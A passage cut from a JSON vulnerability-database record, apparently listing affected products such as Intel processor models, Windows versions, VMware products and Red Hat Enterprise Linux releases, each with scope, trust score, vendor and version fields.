"scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2600" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2660_v3" }, { "model": "xeon e5 2630l", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8850" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4890_v2" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5115" }, { "model": "xeon e3 1231 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3450s" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2467m" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6100" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2450p" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l5630" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3570s" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3736f" }, { "model": "xeon e5 2603", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7600u" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "lc5518" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3470t" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3517u" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8870_v3" }, { "model": "xeon phi", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7290f" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6006u" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5350u" }, { "model": "xeon e5 2650", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2670" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4370" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2120t" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2683_v4" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4850_v2" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4712hq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5650u" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5257u" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6142" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4100u" }, { "model": "xeon phi", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7230" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2670_v3" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2830" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4790k" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3250" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "660ue" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6585r" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "620um" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8350u" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "990x" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4770s" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2665" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "750s" }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8176m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5550u" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6132" }, { "model": "xeon e3 1280", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2450l", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4340te" }, { "model": "celeron j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j4105" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4590" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3555le" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2667_v3" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x3440" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2840" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6126" }, { "model": "xeon e3 1125c v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1225 v6", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1275 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2330e" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4669_v3" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l3406" }, { "model": "xeon e3 1505l v6", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3950" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "430m" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z2520" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x3430" }, { "model": "xeon e3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "1578l_v5" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4200m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4570s" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2699r_v4" }, { "model": "xeon e5 2628l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5603" }, { "model": "xeon silver", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4108" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "540" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4670s" }, { "model": "xeon e5 1630 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon silver", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4116" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3750" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2500k" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5530" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3635qm" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2658" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4670t" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3560" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3050" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "720qm" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3340" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3340m" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6100h" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2738" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6442eq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4790s" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2377m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "880" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7500u" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "860" }, { "model": "pentium n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3510" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2310e" }, { "model": "atom e", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e3815" }, { "model": "xeon e5 2648l v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z2420" }, { "model": "atom x3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3295rk" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2805" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "470um" }, { "model": "xeon e5 1620", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2640 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2410m" }, { "model": "xeon e3 1235l v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "520um" }, { "model": "xeon e5 2643 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5670" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8891_v2" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4440" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3720qm" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e7530" }, { "model": "xeon e3 1240", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1220 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2120" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4400e" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3770s" }, { "model": "xeon e5 2648l", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4030u" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4340m" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2687w_v4" }, { "model": "xeon e5 1650 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1235", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2430l", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2400s" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4880_v2" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6300u" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5200u" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8837" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5557u" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4750hq" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6098p" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2690_v2" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4624l_v2" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "520m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3320m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4558u" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3427u" }, { "model": "pentium j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j2850" }, { "model": "xeon e3 1270 v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "celeron j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j3160" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6260u" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2660" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5690" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2698_v4" }, { "model": "xeon e5 2450", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2438l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4258u" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2330m" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4010u" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4570t" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8850_v2" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4850_v3" }, { "model": "xeon phi", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7230f" }, { "model": "xeon e5 2630l v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4460" }, { "model": "xeon e3 1265l v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon phi", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7295" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x3460" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7567u" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4640_v2" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x3480" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "w3690" }, { "model": "atom x3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3265rk" }, { "model": "xeon e3 1280 v6", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5607" }, { "model": "xeon e5 2623 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2680_v4" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "940xm" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4650_v3" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2340ue" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6134m" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5010u" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4620_v2" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4300u" }, { "model": "xeon e3 1220", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4100m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4770" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6126f" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3550" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3610qe" }, { "model": "xeon silver", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4112" }, { "model": "xeon e3 1265l v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z2480" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3735f" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2500s" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2667" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3570t" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2670qm" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2699_v3" }, { "model": "xeon e3 1240l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2550" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5507" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3740d" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4620_v3" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "660um" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4850hq" }, { "model": "xeon e5 2603 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2920xm" }, { "model": "xeon e5 2609 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1245 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3830" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3735d" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3632qm" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2658_v3" }, { "model": "xeon phi", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7285" }, { "model": "xeon e5 2420 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4570te" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6440eq" }, { "model": "xeon e5 1630 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8880_v3" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2500t" }, { "model": "xeon e3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "1515m_v5" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6150" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "lc5528" }, { "model": "xeon e3 1220 v6", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2650 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 1620 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "655k" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4370t" }, { "model": "atom x3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3230rk" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4200y" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l7545" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4440s" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4570" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8893_v4" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4700eq" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x7550" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2558" }, { "model": "xeon e3 1275 v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2637", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon phi", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7250f" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2830" }, { "model": "xeon e3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "1505m_v6" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4610_v3" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3217u" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2365m" }, { "model": "pentium n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3700" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "620m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4770hq" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2370m" }, { "model": "xeon e3 1246 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4402ec" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6142f" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4655_v3" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3745d" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "620ue" }, { "model": "windows for 32-bit systems sp1", "scope": "eq", "trust": 0.9, "vendor": "microsoft", "version": "7" }, { "model": "windows for x64-based systems sp1", "scope": "eq", "trust": 0.9, "vendor": "microsoft", "version": "7" }, { "model": "edge", "scope": "eq", "trust": 0.9, "vendor": "microsoft", "version": "0" }, { "model": "internet explorer", "scope": "eq", "trust": 0.9, "vendor": "microsoft", "version": "11" }, { "model": "windows for x64-based systems", "scope": "eq", "trust": 0.9, "vendor": "microsoft", "version": "8.10" }, { "model": "windows for 32-bit systems", "scope": "eq", "trust": 0.9, "vendor": "microsoft", "version": "8.10" }, { "model": "windows version for x64-based systems", "scope": "eq", "trust": 0.9, "vendor": "microsoft", "version": "1015110" }, { "model": "windows version for 32-bit systems", "scope": "eq", "trust": 0.9, "vendor": "microsoft", "version": "1015110" }, { "model": "esxi", "scope": "eq", "trust": 0.9, "vendor": "vmware", "version": "5.5" }, { "model": "workstation", "scope": "eq", "trust": 0.9, "vendor": "vmware", "version": "12.5.7" }, { "model": "workstation", "scope": "eq", "trust": 0.9, "vendor": "vmware", "version": "12.5.5" }, { "model": "workstation", "scope": "eq", "trust": 0.9, "vendor": "vmware", "version": "12.5.3" }, { "model": "workstation", "scope": "eq", "trust": 0.9, "vendor": "vmware", "version": "12.0" }, { "model": "fusion", "scope": "eq", "trust": 0.9, "vendor": "vmware", "version": "8.5.8" }, { "model": "fusion", "scope": "eq", "trust": 0.9, "vendor": "vmware", "version": "8.5.6" }, { "model": "fusion", "scope": "eq", "trust": 0.9, "vendor": "vmware", "version": "8.5.4" }, { "model": "fusion", "scope": "eq", "trust": 0.9, "vendor": "vmware", "version": "8.5.2" }, { "model": "fusion", "scope": "eq", "trust": 0.9, "vendor": "vmware", "version": "8.1.1" }, { "model": "fusion", "scope": "eq", "trust": 0.9, "vendor": "vmware", "version": "8.1" }, { "model": "fusion", "scope": "eq", "trust": 0.9, "vendor": "vmware", "version": "8.0.2" }, { "model": "fusion", "scope": "eq", "trust": 0.9, "vendor": "vmware", "version": "8.0.1" }, { "model": "fusion", "scope": "eq", "trust": 0.9, "vendor": "vmware", "version": "8.5.5" }, { "model": "fusion", "scope": "eq", "trust": 0.9, "vendor": "vmware", "version": "8.5" }, { "model": "fusion", "scope": "eq", "trust": 0.9, "vendor": "vmware", "version": "8.0" }, { "model": "esxi", "scope": "eq", "trust": 0.9, "vendor": "vmware", "version": "6.5" }, { "model": "esxi", "scope": "eq", "trust": 0.9, "vendor": "vmware", "version": "6.0" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "amd", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "arm", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "apple", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "cisco", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "dell", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "dell emc", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "hp", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ibm", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "intel", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "microsoft", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "qualcomm incorporated", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "red hat", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "suse linux", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "synology", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ubuntu", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "vmware", "version": null }, { "model": "\uff08\u8907\u6570\u306e\u88fd\u54c1\uff09", "scope": "eq", "trust": 0.8, "vendor": "\u8907\u6570\u306e\u30d9\u30f3\u30c0", "version": null }, { "model": "\uff08\u8907\u6570\u306e\u88fd\u54c1\uff09", "scope": "eq", "trust": 0.8, "vendor": "\u8907\u6570\u306e\u30d9\u30f3\u30c0", "version": "(multiple products)" }, { "model": "\uff08\u8907\u6570\u306e\u88fd\u54c1\uff09", "scope": null, "trust": 0.8, "vendor": "\u8907\u6570\u306e\u30d9\u30f3\u30c0", "version": null }, { "model": "hat enterprise linux desktop", "scope": "eq", "trust": 0.6, "vendor": "red", "version": "6" }, { "model": "windows server r2", "scope": "eq", "trust": 0.6, "vendor": "microsoft", "version": "2008" }, { "model": "hat enterprise linux", "scope": "eq", "trust": 0.6, "vendor": "red", "version": "6" }, { "model": "hat enterprise linux workstation", "scope": "eq", "trust": 0.6, "vendor": "red", "version": "6" }, { "model": "hat enterprise linux server", "scope": "eq", "trust": 0.6, "vendor": "red", "version": "6" }, { "model": "windows windows server", "scope": "eq", "trust": 0.6, "vendor": "microsoft", "version": "2012" }, { "model": "windows", "scope": "eq", "trust": 0.6, "vendor": "microsoft", "version": "8.1" }, { "model": null, "scope": "eq", "trust": 0.6, "vendor": "google", "version": "v8" }, { "model": "windows server r2", "scope": "eq", "trust": 0.6, "vendor": "microsoft", "version": "2012" }, { "model": "windows server", "scope": "eq", "trust": 0.6, "vendor": "microsoft", "version": "2016" }, { "model": "windows for 32-bit systems", "scope": "eq", "trust": 0.6, "vendor": "microsoft", "version": "10" }, { "model": "windows for x64-based systems", "scope": "eq", "trust": 0.6, "vendor": "microsoft", "version": "10" }, { "model": "windows version for 32-bit systems", "scope": "eq", "trust": 0.6, "vendor": "microsoft", "version": "101511" }, { "model": "windows version for x64-based systems", "scope": "eq", "trust": 0.6, "vendor": "microsoft", "version": "101511" }, { "model": "windows version for 32-bit systems", "scope": "eq", "trust": 0.6, "vendor": "microsoft", "version": "101607" }, { "model": "windows version for x64-based systems", "scope": "eq", "trust": 0.6, "vendor": "microsoft", "version": "101607" }, { "model": "windows version for 32-bit systems", "scope": "eq", "trust": 0.6, "vendor": "microsoft", "version": "101703" }, { "model": "windows version for x64-based systems", "scope": "eq", "trust": 0.6, "vendor": "microsoft", "version": "101703" }, { "model": "hat enterprise linux workstation", "scope": "eq", "trust": 0.6, "vendor": "red", "version": "7" }, { "model": "hat 